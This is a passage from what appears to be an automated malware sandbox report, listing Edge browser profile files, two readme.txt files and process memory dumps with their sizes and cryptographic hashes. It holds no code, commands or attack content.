bda611ddba56513a30295ea5ca8bc59e552154f860d13fed97201cdb81814dd6d1bca7deca6f8f58c9ae585d91e450f4383a365f80560f4b8e59a4c8b53c327d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
5495f366e9f5ba9d7ebd2959dd113d29

SHA1
7a7489d25a3df06705fad4ccc92881aea623451a

SHA256
46493569bbad50857165354572603a4e2bbe5a4d52392317cf8ed4a719bb9b00

SHA512
4a4ea7392317e93540892006795991d1596fb59a30568118c0b0e41538a9c62230b119776c8fd9f1a814b04af2196a503958c1ffb3b54270458cc84942e389b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
100004f450e51d0b96d62d370f377646

SHA1
68ede5b7ce2b11d138172f323aa4cda6457350e7

SHA256
aed1f9070df5f9300878a5c0d0c2aa4560582aae88f2f184374b371f5695c5fa

SHA512
e4d7329e382da34fddf2bac2d303c44014eca37a273aabf1079c8dbe7e2cc8cda8f3befc59b4f2f492d1c975d5002f95e7e6f89b062bd572ff51659e1abb9bfe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
121510c1483c9de9fdb590c20526ec0a

SHA1
96443a812fe4d3c522cfdbc9c95155e11939f4e2

SHA256
cf5d26bc399d0200a32080741e12f77d784a3117e6d58e07106e913f257aa46c

SHA512
b367741da9ab4e9a621ad663762bd9c459676e0fb1412e60f7068834cbd5c83b050608e33d5320e1b191be1d809fef48831e0f42b3ecabd38b24ec222576fa81

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
752bafc85da65f2cedb6ef537d67b673

SHA1
2019ce7f8b85f1965e3fb01c53dc82c3c6983ed1

SHA256
24d04d8c96018966dde9ded1d7a6bcf9e7821452ce2062004f4cce1e955bef95

SHA512
6fec3986c7fb2392db0bfb9b03d8ccc7f3aa27c078baece70b6eeaa6c751834f5841052d7ec5d7d6c1d8d0a699bbf545fb434f0103205c967f2e318683d50945

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
c73e8cb85d1288acc9e8266769ba5c65

SHA1
a4bf0af90f881d4b6da3c246aa80d361011af3d5

SHA256
53882a3754808fa2b9f2a4ab5b3f203944336901f86c53047a2a5ba2ca65f6ea

SHA512
576d453b2d932a0d3258ab1f281d98597a8ea41fcc38f15170fb809724b095176a7888e7b862f6234e84f0849389e7bfc145f448695929847db67facfdb23c3b

Download Submit
C:\Users\Admin\Pictures\readme.txt

Filesize
1KB

MD5
96108e50137217badb509f6e80833336

SHA1
c6ce9b5b39861f076e9b153892b15da667943408

SHA256
e856f4d6e251ab26c0a31a418816eb40b31b2189e225fad07a2e81d1c641b2df

SHA512
a3f1b45ffa83b293445c8475d9527a46488580076c4b5b7ab66fc59e9ea53c209da92a666599643a16d63545efff5e9a26abf77e14608ba42958f18921721cb6

Download Submit
C:\Users\Public\readme.txt

Filesize
332B

MD5
718777534403cdcf89b5d9b5f4b2f141

SHA1
3f49f57f3c25d60fef6d5593c9eb5a69b74a7b29

SHA256
619de8a85d1beac2e0b2c9cef08f56fc70859f6f4dd0f763d2175bdac746b0cb

SHA512
8018fdbec663355db212827869eb7744f615f58db96e9a12da248f40979d28d8057bcab945381e43cb346e0b3ded14743efd8b47727ca98e32e430b6519d7440

Download Submit
memory/2472-112-0x00000215A3830000-0x00000215A3834000-memory.dmp

Filesize
16KB

Download
memory/2472-0-0x00000215A3830000-0x00000215A3834000-memory.dmp

Filesize
16KB

Download
memory/3148-62-0x000001F2BFDE0000-0x000001F2BFDE1000-memory.dmp

Filesize
4KB

Download
memory/3148-44-0x000001F2BFDC0000-0x000001F2BFDC1000-memory.dmp

Filesize
4KB

Download
memory/3148-125-0x000001F2BFEF0000-0x000001F2BFEF1000-memory.dmp

Filesize
4KB

Download
memory/3148-95-0x000001F2BFE40000-0x000001F2BFE41000-memory.dmp

Filesize
4KB

Download
memory/3148-268-0x000001F2C2420000-0x000001F2C2421000-memory.dmp

Filesize
4KB

Download
memory/3148-87-0x000001F2BFE20000-0x000001F2BFE21000-memory.dmp

Filesize
4KB

Download
memory/3148-76-0x000001F2BFE10000-0x000001F2BFE11000-memory.dmp

Filesize
4KB

Download
memory/3148-171-0x000001F2C0900000-0x000001F2C0901000-memory.dmp

Filesize
4KB

Download
memory/3148-58-0x000001F2BFDD0000-0x000001F2BFDD1000-memory.dmp

Filesize
4KB

Download
memory/3148-31-0x000001F2BFDA0000-0x000001F2BFDA1000-memory.dmp

Filesize
4KB

Download
memory/3148-43-0x000001F2BFDB0000-0x000001F2BFDB1000-memory.dmp

Filesize
4KB

Download
memory/3148-27-0x000001F2BFAC0000-0x000001F2BFAC1000-memory.dmp

Filesize
4KB

Download
memory/3148-16-0x000001F2BFAB0000-0x000001F2BFAB1000-memory.dmp

Filesize
4KB

Download
memory/3148-8-0x000001F2BF2C0000-0x000001F2BFAA2000-memory.dmp

Filesize
7.9MB

Download